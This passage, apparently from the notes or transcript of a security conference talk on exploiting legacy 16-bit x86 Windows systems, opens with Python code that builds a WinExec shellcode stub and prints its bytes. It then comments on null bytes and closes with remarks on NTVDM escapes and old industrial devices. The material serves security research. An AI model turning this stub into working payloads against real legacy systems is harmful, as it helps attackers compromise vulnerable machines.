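    # No "add sp, 6" afterwards: a Pascal callee removes its own arguments.
    return bytes(code)

if __name__ == "__main__":
    print(winexec_stub(0x1234, 0x00C7, 0x0ABC).hex(" "))
    # 16 68 34 12 68 01 00 9a bc 0a c7 00
```

The `01 00` and `c7 00` pairs are the kind of null bytes the talk mentions having to work around, so a real payload would need to encode them out. `push imm16` (`68`) also assumes an 80186 or later, which any machine running Windows 3.1 in protected mode satisfies.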
If you compromise one, are you sandboxed inside NTVDM, or can you do something much worse, like exploit NTVDM itself, which is relevant and has happened in local exploits? Embedded devices: I don't think there's too much 16-bit x86 out there, but you could have a really old security system or something that's still running. Industrial stuff definitely exists. And then the more reflective question: what's right under our noses now that the exploit techniques just don't exist for yet? When I wrote this last year, Meltdown had not come out yet. So there you go. Right. The white paper has far more interesting details, all the technical stuff; you can find it on our website. I'll be over in the IoT Village for any questions anyone has, so I can let the next speaker come in. Otherwise, I'll wrap up.